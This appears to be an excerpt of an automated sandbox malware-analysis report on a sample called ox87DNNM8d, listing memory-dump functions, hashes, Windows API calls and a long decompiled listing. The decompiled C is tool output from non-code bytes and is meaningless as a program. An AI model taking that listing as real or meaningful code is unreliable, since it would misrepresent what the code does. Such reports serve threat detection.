API String ID: 1378638983-0
Opcode ID: 992d5d9953946d828ebd04ae81a8e7d9d2345b20bad199dc92b1e0aa2d82504b
Instruction ID: 0d104ebc650195b5a7d8866abd813a40f7c37e63a9361d9d1c4784987a4369ad
Opcode Fuzzy Hash: 992d5d9953946d828ebd04ae81a8e7d9d2345b20bad199dc92b1e0aa2d82504b
Instruction Fuzzy Hash: A811F5B59003499FDB10CF99D489BDFBBF8EB48324F14851AE954A7340C374A945CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0642AA70, Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 0642E67D

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7812797c9140887b48576a4459bdad710b9766386f488ad134e5e1dae1756941
Instruction ID: 418728e5fbea99852b7995c10dac5db63943bea5365b84512a711ef2aefb8284
Opcode Fuzzy Hash: 7812797c9140887b48576a4459bdad710b9766386f488ad134e5e1dae1756941
Instruction Fuzzy Hash: 0C11F2B58003599FDB50CF99D884BDFBBF8EB48320F54841AE959A7200C374A944CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0642F9E8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

FindCloseChangeNotification.KERNELBASE(?), ref: 0642FA40

Memory Dump Source

Source File: 00000001.00000002.237545099.0000000006420000.00000040.00000001.sdmp, Offset: 06420000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6420000_ox87DNNM8d.jbxd

Similarity

API ID: ChangeCloseFindNotification
String ID:
API String ID: 2591292051-0
Opcode ID: 9b0d99978785e20ffb0a9fb3b2bda3a9b54051adc395393093d8ba75954c101b
Instruction ID: 4523cf7e2247d9142257bf885dee47fe89fbd0fd91062d0dcba8a9d10ce7e1f5
Opcode Fuzzy Hash: 9b0d99978785e20ffb0a9fb3b2bda3a9b54051adc395393093d8ba75954c101b
Instruction Fuzzy Hash: E91103B1C003598FCB50CF99D444BDEBBF4EB48324F55841AE558A7740D738A548CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 0160BCC8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0160BD2E

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: ed1fee129e1a9b7820e9894f1b32440c65b33f67ff50f9906aca10a5e5518f0e
Instruction ID: a695390805eb1f7809256c5d093052b9979af20eacc9c08551cd2bd49db490d9
Opcode Fuzzy Hash: ed1fee129e1a9b7820e9894f1b32440c65b33f67ff50f9906aca10a5e5518f0e
Instruction Fuzzy Hash: B511FDB6C002498BDB14CF9AD844B9EFBF4AB88224F14841AD419A7240C374A545CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 0160DDE0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

SetWindowLongW.USER32(?,?,?), ref: 0160DE3D

Memory Dump Source

Source File: 00000001.00000002.233979966.0000000001600000.00000040.00000001.sdmp, Offset: 01600000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1600000_ox87DNNM8d.jbxd

Similarity

API ID: LongWindow
String ID:
API String ID: 1378638983-0
Opcode ID: e53c0940aa700f0dad30a681200ec0476b2e8778ab381067e989e71a25f8b3ce
Instruction ID: 91cbf40823288c96b4bbf47f2f34e308a01c67db6851f0c0d55b51e46fa230dd
Opcode Fuzzy Hash: e53c0940aa700f0dad30a681200ec0476b2e8778ab381067e989e71a25f8b3ce
Instruction Fuzzy Hash: 3111D0B59003499FDB10CF99D888BDFBBF8EB48324F14851AE959A7340C374A944CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 011ED4D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.233696009.00000000011ED000.00000040.00000001.sdmp, Offset: 011ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_11ed000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eea440e38f7f8068045d3db2c14062930a2559ebdaad81d9684bb413fee34cf1
Instruction ID: 9c83f363d44a04de03e7f5f24b3392b187aa81b63bd231df14a1fbecf459c478
Opcode Fuzzy Hash: eea440e38f7f8068045d3db2c14062930a2559ebdaad81d9684bb413fee34cf1
Instruction Fuzzy Hash: 132106B1504644DFDF09CF94E9C8B2ABBB5FF88328F258569E9054B206C336D845CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 011FD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.233707232.00000000011FD000.00000040.00000001.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_11fd000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8ce897a36ded155e0fd8417f50e751709166232d4d57532c1cd70e292112ff9
Instruction ID: e2aa124b38b3accf22847b1acd66d567d947eed58eade639afecc0870eea0fbf
Opcode Fuzzy Hash: f8ce897a36ded155e0fd8417f50e751709166232d4d57532c1cd70e292112ff9
Instruction Fuzzy Hash: E12137B1504244DFDF19DF54E4C0B2ABB61FB84354F24C66DEA094B246C736D807CB62

Uniqueness

Uniqueness Score: -1.00%

Function 011FD006, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.233707232.00000000011FD000.00000040.00000001.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_11fd000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18122d12e3844b6db535f1a558fe05d3533fa945e52cf803c1e828497e819100
Instruction ID: b5e7230cba769ef8246826fe45a1a675460b4b53d21d09f8e90fd5c34893ad61
Opcode Fuzzy Hash: 18122d12e3844b6db535f1a558fe05d3533fa945e52cf803c1e828497e819100
Instruction Fuzzy Hash: C6219F755093808FDB07CF24D990B15BF71EB46214F28C5EED9498B6A7C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 011ED4D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.233696009.00000000011ED000.00000040.00000001.sdmp, Offset: 011ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_11ed000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
Instruction ID: 7c19416aedcdc5e6ae6e2b84b2d4a0a9fcd1de35c5bc5a25f0bf94805f1a9542
Opcode Fuzzy Hash: 8c6ced9d0c9f6690be594cbf568882f55a05229423d0602ee79acece9868a76a
Instruction Fuzzy Hash: C311AF76904680CFDF16CF54E9C4B16BFB1FF84324F2886A9D8050B656C33AD45ACBA2

Uniqueness

Uniqueness Score: -1.00%

Function 011ED749, Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.233696009.00000000011ED000.00000040.00000001.sdmp, Offset: 011ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_11ed000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 65145b302098f09f97b7dd926e5c5239c14ad0af8cfbd89b260f85c5f02c4082
Instruction ID: ec41568da6739a4c6a92df3c5943c73ac71ef563c9d0607b4b159cbb61ac42ae
Opcode Fuzzy Hash: 65145b302098f09f97b7dd926e5c5239c14ad0af8cfbd89b260f85c5f02c4082
Instruction Fuzzy Hash: 9001FC71848FC49AEB144BD5EC88B6AFFD8EF4127CF09851AEA055A247C3759844C672

Uniqueness

Uniqueness Score: -1.00%

Function 011ED748, Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.233696009.00000000011ED000.00000040.00000001.sdmp, Offset: 011ED000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_11ed000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88a9538537a904616f8a074f194d6f54546737a2475e1fa349893a082e08da86
Instruction ID: d32c40f2537eb77f54c75f5e2109e8680981c6975fbf2fe54c4fd506bbf27d60
Opcode Fuzzy Hash: 88a9538537a904616f8a074f194d6f54546737a2475e1fa349893a082e08da86
Instruction Fuzzy Hash: BBF0C8714046849AEB158B46DC84B62FFD8EF41738F18C45AED080B247C3755844CAB1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B55D17, Relevance: 4.0, Instructions: 4029COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.233109225.0000000000B52000.00000002.00020000.sdmp, Offset: 00B50000, based on PE: true

Associated: 00000001.00000002.233091224.0000000000B50000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.233268341.0000000000C08000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_b50000_ox87DNNM8d.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5918a18e5d511f530364f706ecb175e08e67e4cf06e0447dbb680232092b41c7
Instruction ID: 89e446a5cd9928a0687240cedaa16413a28f87bead951a36fb03159913dad2ff
Opcode Fuzzy Hash: 5918a18e5d511f530364f706ecb175e08e67e4cf06e0447dbb680232092b41c7
Instruction Fuzzy Hash: 5863482104EBC25FC7139B746D712E1BFB1AE5721831E49CBC4C08F5A3E6191AAAD772

Uniqueness

Uniqueness Score: -1.00%

Function 00B58782, Relevance: 3.2, Instructions: 3183
COMMONCrypto

Download Yara Rule

C-Code - Quality: 66%

			E00B58782(void* __eax, signed char __ebx, signed int __ecx, signed char __edx, signed int* __edi, signed int __esi, void* __fp0) {
				signed int _t669;
				signed char _t670;
				signed char _t671;
				signed char _t672;
				signed char _t673;
				signed char _t674;
				signed char _t675;
				intOrPtr* _t676;
				intOrPtr* _t677;
				signed char* _t678;
				signed char _t679;
				signed char _t680;
				signed int _t683;
				signed char _t684;
				signed char _t685;
				signed char _t689;
				signed char _t690;
				signed char _t693;
				signed int _t694;
				signed char _t695;
				signed char _t696;
				intOrPtr* _t698;
				intOrPtr* _t699;
				signed char _t700;
				intOrPtr* _t701;
				signed char _t702;
				signed char _t703;
				signed char _t705;
				signed char _t706;
				signed char _t707;
				signed char _t709;
				signed char _t710;
				signed char _t711;
				signed char _t712;
				signed char _t713;
				signed char _t714;
				signed char _t715;
				signed char _t716;
				signed char _t717;
				signed char _t718;
				signed char _t719;
				signed char _t720;
				signed char _t721;
				signed char _t722;
				signed char _t723;
				signed char _t724;
				signed char _t725;
				signed char _t726;
				signed char _t727;
				signed char _t732;
				signed char _t733;
				signed char _t734;
				signed char _t735;
				signed char _t736;
				signed char _t737;
				signed char _t738;
				signed char _t739;
				signed char _t741;
				signed char _t742;
				signed char _t743;
				signed char _t745;
				intOrPtr* _t746;
				signed char _t748;
				intOrPtr* _t749;
				signed char _t751;
				intOrPtr* _t752;
				signed int _t753;
				intOrPtr* _t754;
				intOrPtr* _t756;
				intOrPtr* _t757;
				signed int* _t758;
				signed char _t759;
				signed char _t760;
				signed char _t761;
				signed char _t762;
				intOrPtr* _t763;
				signed char _t1065;
				signed char _t1066;
				intOrPtr* _t1068;
				signed char _t1073;
				signed char _t1074;
				signed char _t1075;
				signed char _t1076;
				signed char _t1077;
				signed char _t1078;
				signed char _t1079;
				signed char _t1080;
				signed char _t1081;
				signed char _t1082;
				signed char _t1083;
				signed char _t1084;
				signed char _t1085;
				intOrPtr* _t1086;
				signed char _t1087;
				signed char _t1088;
				intOrPtr* _t1090;
				signed char _t1091;
				signed char _t1092;
				signed char _t1093;
				void* _t1095;
				void* _t1096;
				void* _t1097;
				signed char _t1098;
				intOrPtr* _t1129;
				signed char _t1131;
				signed char _t1132;
				signed char _t1133;
				signed char _t1136;
				signed char _t1137;
				signed char _t1139;
				signed char _t1141;
				signed char _t1145;
				signed char _t1146;
				signed char _t1155;
				signed char _t1158;
				signed char _t1160;
				signed char _t1161;
				signed char _t1162;
				signed char _t1163;
				signed char _t1164;
				void* _t1281;
				void* _t1282;
				void* _t1283;
				signed char _t1284;
				signed char _t1285;
				signed char _t1286;
				signed char _t1292;
				void* _t1302;
				signed char _t1304;
				intOrPtr* _t1305;
				signed char _t1307;
				intOrPtr* _t1308;
				signed char _t1309;
				signed int* _t1368;
				void* _t1371;
				signed int _t1385;
				signed char _t1386;
				signed char _t1387;
				signed char _t1388;
				signed int* _t1389;
				void* _t1395;
				void* _t1396;
				intOrPtr* _t1397;
				void* _t1406;
				void* _t1407;
				intOrPtr _t1421;
				intOrPtr _t1426;
				intOrPtr _t1432;
				void* _t1437;
				signed char _t1440;
				void* _t1462;
				void* _t1472;
				void* _t1482;
				signed char _t1516;
				void* _t1524;
				intOrPtr* _t1539;

				_t1385 = __esi;
				_t1368 = __edi;
				_t1293 = __edx;
				_t1087 = __ebx;
				_t669 = __eax + 2;
				 *__esi =  *__esi - __edx;
				 *_t669 =  *_t669 + _t669;
				_t1131 = __ecx |  *__edx;
				 *_t669 =  *_t669 + _t669;
				asm("adc esi, [eax]");
				 *_t669 =  *_t669 | _t669;
				asm("movsd");
				_t670 = _t669 +  *_t669;
				 *__ebx =  *__ebx + _t1131;
				 *_t670 =  *_t670 + _t670;
				asm("adc [edx], eax");
				 *((intOrPtr*)(_t1131 + 0x20a0000)) =  *((intOrPtr*)(_t1131 + 0x20a0000)) - _t670;
				 *((intOrPtr*)(__edx + 0x730a0000)) =  *((intOrPtr*)(__edx + 0x730a0000)) - _t670;
				 *0xa0a0000 = _t670;
				while(1) {
					L1:
					 *_t670 =  *_t670 + _t670;
					_t1132 = _t1131 |  *_t1293;
					_push(es);
					 *((intOrPtr*)(_t670 + _t670 + 0x120b0a00)) =  *((intOrPtr*)(_t670 + _t670 + 0x120b0a00)) - _t670;
					_t1293 = _t1293 +  *_t1385;
					_push(ss);
					_t1133 = _t1132 +  *_t670;
					_t671 =  *0x170a0000;
					asm("fiadd dword [edx]");
					0x170a0000[_t1293] = 0x170a0000[_t1293] - _t671;
					asm("fisubr dword [eax]");
					asm("movsd");
					 *_t671 =  *_t671 + _t671;
					_t672 = _t671 |  *_t1293;
					_t1395 = _t1395 +  *_t672;
					asm("cmpsb");
					 *_t672 =  *_t672 + _t672;
					while(1) {
						_t673 = _t672 |  *_t1368;
						asm("sbb [edi-0x58], ch");
						 *_t673 =  *_t673 + _t673;
						_t674 = _t673 |  *_t1368;
						 *_t674 =  *_t674 + _t674;
						 *_t674 =  *_t674 + _t674;
						_t675 = _t674 |  *_t674;
						asm("adc [esi+0x1b5282a], dl");
						 *_t1385 =  *_t1385 + _t675;
						_t670 = _t675 &  *_t675;
						 *_t670 =  *_t670 + _t1293;
						_t1131 = (_t1133 + _t1368[9] |  *(_t1368 - 0x59)) + 1;
						_push(ss);
						if(_t1131 >= 0) {
							goto L1;
						}
						 *_t670 =  *_t670 + _t670;
						_t1136 = _t1131 |  *0x9d20;
						 *_t1368 =  *_t1368 + _t1087;
						if( *_t1368 > 0) {
							 *((intOrPtr*)(_t1395 + _t1385)) =  *((intOrPtr*)(_t1395 + _t1385)) - _t1087;
							 *_t1293 =  *_t1293 + _t1136;
							_t672 = _t670 &  *_t670;
							 *((intOrPtr*)(_t672 + 0x16c733f)) =  *((intOrPtr*)(_t672 + 0x16c733f)) + _t672;
							 *_t1293 =  *_t1293 + _t1136;
							asm("adc eax, [edi+ebx]");
							ds = _t1385;
							asm("insd");
							_pop(ds);
							asm("insd");
							 *_t1293 =  *_t1293 - _t1087;
							L5:
							 *_t1293 =  *_t1293 + _t1133;
							if( *_t1293 >= 0) {
								continue;
							}
						}
						 *_t670 =  *_t670 + _t670;
						_t1293 = _t1293 |  *_t1087;
						_t676 = _t670 + 0x827b02;
						 *((intOrPtr*)(_t1087 + _t1293)) =  *((intOrPtr*)(_t1087 + _t1293)) + _t676;
						asm("adc [esi], eax");
						_t1395 = _t1395 + 1;
						_t677 = _t676 +  *_t676;
						 *_t677 =  *_t677 + _t677;
						_t678 = _t677 + 0x98000000;
						 *_t678 =  &(_t678[ *_t678]);
						 *_t1385 =  *_t1385 + _t1136;
						 *_t678 =  &(_t678[ *_t678]);
						 *_t678 =  *_t678 + _t1087;
						asm("scasb");
						 *_t678 =  &(_t678[ *_t678]);
						 *_t678 =  *_t678 + _t1136;
						_t1137 = _t1136 & _t1087;
						 *_t678 =  &(_t678[ *_t678]);
						 *_t678 =  &(_t678[ *_t678]);
						 *0x20000000 = _t678;
						 *_t678 =  *_t678;
						 *_t678 =  *_t678 + _t1137;
						if ( *_t678 != 0) goto L7;
						 *_t1293 =  *_t1293 + _t1137;
						_t1133 = _t1137;
						 *_t678 =  &(_t678[ *_t678]);
						 *_t678 =  &(_t678[ *_t678]);
						_t679 =  *_t678;
						 *_t679 =  *_t679 + _t679;
						ds = es;
						asm("arpl [eax], bp");
						if ( *_t679 != 0) goto L8;
						 *_t1293 =  *_t1293 + _t1133;
						_t672 = _t679 &  *_t679;
						_t19 = _t1293 + 0xaa73 + _t672 * 2;
						 *_t19 =  *((intOrPtr*)(_t1293 + 0xaa73 + _t672 * 2)) + _t1293;
						_t1421 =  *_t19;
						L9:
						while(_t1421 < 0) {
							 *_t672 =  *_t672 + _t672;
							_pop(es);
							_pop(es);
							asm("adc [edi], eax");
							 *_t1133 =  *_t1133 | _t1087;
							 *((intOrPtr*)(_t1133 + _t672 - 0x5490fa00)) =  *((intOrPtr*)(_t1133 + _t672 - 0x5490fa00)) - _t672;
							 *_t672 =  *_t672 + _t672;
							_t680 = _t672 |  *_t1368;
							asm("adc [eax+ecx], eax");
							asm("sbb [eax], ebp");
							 *_t1385 =  *_t1385 + _t680;
							asm("outsd");
							asm("scasb");
							 *_t680 =  *_t680 + _t680;
							 *(_t680 |  *_t1368) =  *(_t680 |  *_t1368) + (_t680 |  *_t1368);
							_t1139 = _t1133 +  *((intOrPtr*)(_t1368 - 0x4f)) |  *(_t1133 +  *((intOrPtr*)(_t1368 - 0x4f)));
							asm("adc [0x28021616], eax");
							_t672 =  *0x170a0000;
							asm("fiadd dword [edx]");
							0x170a0000[_t1293 |  *_t1087] = 0x170a0000[_t1293 |  *_t1087] - _t672;
							asm("fidiv dword [ebx-0x5b]");
							while(1) {
								asm("movsd");
								 *_t672 =  *_t672 + _t672;
								_t1133 = _t1139 |  *_t672;
								_t1293 = 0;
								 *0 =  *0 + _t1133;
								if( *0 >= 0) {
									goto L9;
								}
								 *_t672 =  *_t672 + _t672;
								 *0 =  *0 + _t1133;
								_t683 = (_t672 |  *0xb46f17) & 0x00b56f17;
								 *0 =  *0 + _t1133;
								asm("outsd");
								 *0 =  *0 + _t1133;
								 *_t683 =  *_t683 + _t683;
								 *_t683 =  *_t683 + _t1133;
								_t1088 = _t1087;
								 *_t683 =  *_t683 + _t683;
								 *_t683 =  *_t683 + _t683;
								_t1296 = 0x20000000;
								asm("cdq");
								 *_t683 =  *_t683 + _t683;
								 *_t683 =  *_t683 + _t1133;
								if ( *_t683 != 0) goto L13;
								 *0x20000000 =  &(( *0x20000000)[_t1133]);
								_t1087 = _t1088;
								 *_t683 =  *_t683 + _t683;
								 *_t683 =  *_t683 + _t683;
								asm("stosd");
								 *_t683 =  *_t683 + _t683;
								 *_t683 =  *_t683 + _t683;
								_t684 =  *_t683;
								 *_t684 = _t683;
								 *_t684 =  *_t684 + _t684;
								 *0x20000000 =  *0x20000000 - _t1087;
								 *0x20000000 =  &(( *0x20000000)[_t1133]);
								_t672 = _t684 &  *_t684;
								_t35 = 0x20000000 + 0xaa73 + _t672 * 2;
								 *_t35 =  *((intOrPtr*)(0x20000000 + 0xaa73 + _t672 * 2));
								_t1426 =  *_t35;
								L14:
								while(_t1426 < 0) {
									 *_t672 =  *_t672 + _t672;
									_t1297 = _t1296 |  *_t1087;
									 *_t1368 =  *_t1368 | _t672;
									asm("adc [eax], ecx");
									 *_t1133 =  *_t1133 | _t1087;
									 *((intOrPtr*)(_t1133 + _t672 - 0x5490fa00)) =  *((intOrPtr*)(_t1133 + _t672 - 0x5490fa00)) - _t672;
									 *_t672 =  *_t672 + _t672;
									_t685 = _t672 |  *_t1368;
									asm("adc [eax+ecx], eax");
									asm("sbb [eax], ebp");
									 *_t1385 =  *_t1385 + _t685;
									asm("outsd");
									asm("scasb");
									 *_t685 =  *_t685 + _t685;
									 *(_t685 |  *_t1368) =  *(_t685 |  *_t1368) + (_t685 |  *_t1368);
									_t1141 = _t1133 +  *((intOrPtr*)(_t1368 - 0x4f)) |  *(_t1133 +  *((intOrPtr*)(_t1368 - 0x4f)));
									asm("adc [0x28021616], eax");
									_t672 =  *0x170a0000;
									while(1) {
										asm("fiadd dword [edx]");
										0x170a0000[_t1297 |  *_t1368] = 0x170a0000[_t1297 |  *_t1368] - _t672;
										asm("fidiv dword [ebx-0x5b]");
										 *_t672 =  *_t672 + _t672;
										_t1139 = _t1141 |  *_t672;
										_t1296 = 0;
										 *0 =  *0 + _t1139;
										if( *0 >= 0) {
											goto L14;
										}
										 *_t672 =  *_t672 + _t672;
										 *0 =  *0 + _t1139;
										 *0 =  *0 + _t1139;
										asm("outsd");
										_t1299 = 0;
										 *0 =  *0 + _t1139;
										_t689 = (_t672 |  *0xb46f17) & 0x00b56f17 & _t1139;
										 *_t689 =  *_t689 + _t689;
										 *_t1368 =  *_t1368 + _t1087;
										if( *_t1368 != 0) {
											 *0 =  *0 - _t1087;
											 *0 =  *0 + _t1139;
											_t1297 = 0x00000000 & _t689;
											 *_t689 =  *_t689 + _t689;
											 *_t1368 =  *_t1368 + _t1087;
											ds = _t1087;
											_t1141 = _t1139 + 1;
											 *_t1297 =  *_t1297 - _t1087;
											 *_t1297 =  *_t1297 + _t1141;
											_t672 = _t689 &  *_t689;
											_t51 = _t1297 + 0xaa73 + _t672 * 2;
											 *_t51 =  *((intOrPtr*)(_t1297 + 0xaa73 + _t672 * 2));
											_t1432 =  *_t51;
											L19:
											if(_t1432 >= 0) {
												continue;
											} else {
												 *_t672 =  *_t672 + _t672;
												_t1299 = _t1297 |  *_t1087;
											}
										}
										 *_t1368 =  *_t1368 | _t689;
										asm("adc [ecx], ecx");
										 *_t1139 =  *_t1139 | _t1087;
										 *((intOrPtr*)(_t1139 + _t689 - 0x5490fa00)) =  *((intOrPtr*)(_t1139 + _t689 - 0x5490fa00)) - _t689;
										 *_t689 =  *_t689 + _t689;
										_t690 = _t689 |  *_t1368;
										asm("adc [eax+ecx], eax");
										asm("sbb [eax], ebp");
										 *_t1385 =  *_t1385 + _t690;
										asm("outsd");
										asm("scasb");
										 *_t690 =  *_t690 + _t690;
										 *(_t690 |  *_t1368) =  *(_t690 |  *_t1368) + (_t690 |  *_t1368);
										asm("adc [0x28021616], eax");
										_t672 =  *0x170a0000;
										asm("fiadd dword [edx]");
										0x170a0000[_t1299] = 0x170a0000[_t1299] - _t672;
										asm("fidiv dword [ebx-0x5b]");
										 *_t672 =  *_t672 + _t672;
										_t1141 = _t1139 +  *((intOrPtr*)(_t1368 - 0x4f)) |  *(_t1139 +  *((intOrPtr*)(_t1368 - 0x4f))) |  *_t672;
										_t1297 = 0;
										 *0 =  *0 + _t1141;
										if( *0 >= 0) {
											goto L19;
										}
										 *_t672 =  *_t672 + _t672;
										 *0 =  *0 + _t1141;
										_t693 = (_t672 |  *0xb46f17) & 0x00b56f17;
										 *0 =  *0 + _t1141;
										asm("outsd");
										 *0 =  *0 + _t1141;
										_t1396 = _t1395 +  *((intOrPtr*)(_t1368 - 0x49));
										 *_t693 =  *_t693 + _t693;
										_t1302 =  *_t693;
										_t694 = _t1385;
										_t1386 = _t693;
										_t1145 = 1;
										 *_t1386 =  *_t1386 + _t694;
										asm("sbb [ebp+0x1000073], ecx");
										_t695 = _t694 & 0xb86f0616;
										 *_t695 =  *_t695 + _t695;
										_t696 = _t695 |  *(_t1302 - 0x73e9e8db);
										asm("insb");
										 *_t696 =  *_t696 + _t696;
										 *((intOrPtr*)(_t1302 - 0x73e9e7db)) =  *((intOrPtr*)(_t1302 - 0x73e9e7db)) + _t1406;
										asm("insb");
										 *_t696 =  *_t696 + _t696;
										 *((intOrPtr*)(_t1302 + 0x17141414)) =  *((intOrPtr*)(_t1302 + 0x17141414)) + _t1406;
										 *0x260A0001 =  *((intOrPtr*)(0x260a0001)) - _t1087;
										_pop(es);
										asm("outsd");
										asm("outsd");
										 *_t696 =  *_t696 + _t696;
										 *((intOrPtr*)(_t1386 + 2)) =  *((intOrPtr*)(_t1386 + 2)) + 0x2a0a0000;
										 *0x20a0000 =  *0x20a0000 - _t696;
										_t1090 = 0x2a0a0000;
										_push(es);
										if(0x2a0a0000 >= 0) {
											 *_t1386 =  *_t1386 + _t696;
											_t1437 =  *_t1386;
										}
										_push(es);
										if(_t1437 < 0) {
											 *_t696 =  *_t696 + _t696;
											_t1145 = _t1145 |  *_t696;
											asm("daa");
											 *_t696 =  *_t696 + _t696;
											_t1085 = _t696 |  *0x60a0000;
											 *((intOrPtr*)(_t1145 + 1)) =  *((intOrPtr*)(_t1145 + 1)) - 0x60a0000;
											 *_t1386 =  *_t1386 + _t1085;
											_t1129 = _t1090 -  *_t1090;
											 *0x60a0000 =  *0x60a0000 ^ _t1085;
											 *_t1145 =  *_t1145 + _t1145;
											 *_t1085 =  *_t1085 + _t1085;
											 *_t1129 =  *_t1129 + _t1085;
											 *_t1085 =  *_t1085 + _t1085;
											asm("adc [ebx], eax");
											_t1086 = _t1085 - 0xb;
											_t1090 = _t1129 +  *((intOrPtr*)(_t1129 - 0x7d));
											 *_t1086 =  *_t1086 + _t1086;
											_t696 = _t1086 + 0x14;
											 *_t1090 =  *_t1090 + 1;
										}
										_t1397 = _t1396 +  *_t1090;
										 *_t1386 = 0x60a0000 +  *_t1386;
										_t698 = (_t696 |  *_t1386) - 0xb;
										_t1091 = _t1090 +  *((intOrPtr*)(_t1090 - 0x7d));
										 *_t698 =  *_t698 + _t698;
										_t699 = _t698 + 0x6f;
										 *_t699 =  *_t699 - _t699;
										 *0x60a0000 =  *0x60a0000 + _t1145;
										asm("fimul word [eax]");
										_t700 = _t699 +  *_t1091;
										 *_t1145 =  *_t1145 - _t1145;
										 *_t700 =  *_t700 + _t700;
										_t1092 = _t1091 | _t700;
										_t701 = _t700 -  *_t700;
										_t1304 = 0x060a0000 |  *_t1368;
										 *_t701 =  *_t701 + _t1304;
										 *_t701 =  *_t701 + _t701;
										_t702 = _t701 +  *_t701;
										 *_t702 =  *_t702 + _t702;
										 *_t702 =  *_t702 & _t702;
										 *_t702 =  *_t702 + _t1145;
										 *_t702 =  *_t702 + _t702;
										 *_t702 =  *_t702 + _t702;
										asm("adc esi, [eax]");
										_push(es);
										 *((intOrPtr*)(_t1092 + _t702 + 0x40000)) =  *((intOrPtr*)(_t1092 + _t702 + 0x40000)) + _t1304;
										 *_t1145 =  *_t1145 + _t1304;
										 *_t1092 =  *_t1092 << 1;
										 *_t702 =  *_t702 + _t702;
										_t1146 = _t1145 +  *_t702;
										_t703 = _t702 -  *_t702;
										 *_t1304 =  *_t1304 + _t1146;
										if( *_t1304 < 0) {
											 *_t703 =  *_t703 + _t703;
											 *_t703 =  *_t703 + _t703;
											 *_t703 =  *_t703 + _t703;
											_push(es);
											 *_t703 =  *_t703 + _t703;
											 *_t703 =  *_t703 + _t703;
											_push(es);
											 *_t703 =  *_t703 + _t703;
											_t1292 = _t1146 |  *_t1304 | _t1368[0x1c] | _t1368[0x1d] | _t1368[0x1d];
											 *_t703 =  *_t703 + _t703;
											_push(es);
											_t1304 = _t1304 +  *((intOrPtr*)(_t1092 + 0x2e)) +  *((intOrPtr*)(_t1092 + 0x2c)) +  *((intOrPtr*)(_t1092 + 0x6d)) +  *((intOrPtr*)(_t1092 + 0x31));
											 *_t703 =  *_t703 + _t703;
											_t1146 = _t1292 | _t1368[0x1e];
											_t1440 = _t1146;
										}
										asm("outsd");
										if(_t1440 < 0) {
											 *_t1386 =  *_t1386 + _t703;
										}
										_push(es);
										_t1305 = _t1304 +  *((intOrPtr*)(_t1092 + 0x2d));
										 *_t703 =  *_t703 + _t703;
										 *_t703 =  *_t703 + _t703;
										_push(es);
										 *_t703 =  *_t703 + _t703;
										_push(es);
										asm("outsd");
										 *_t1305 =  *_t1305 + (_t1146 | _t1368[0x1e]) + _t1368[0x1c];
										_t705 = _t703 ^ 0x20a0000;
										asm("outsd");
										if(_t705 >= 0) {
											 *_t1386 =  *_t1386 + _t705;
										}
										_push(es);
										_push(es);
										_t706 = _t705 & _t1092;
										asm("sbb al, 0x96");
										 *_t1386 =  *_t1386 + _t706;
										asm("outsd");
										 *_t706 =  *_t706 + _t706;
										_t1307 = _t1305 + 0x00000001 |  *(_t1305 + 1 + (_t1305 + 1) * 2);
										 *1 =  *1 + _t706;
										asm("outsd");
										_t1093 = _t1092 + 1;
										 *_t706 =  *_t706 + _t706;
										_t707 = _t706 |  *_t1307;
										asm("outsd");
										if(_t707 >= 0) {
											 *_t1386 =  *_t1386 + _t707;
										}
										ds = es;
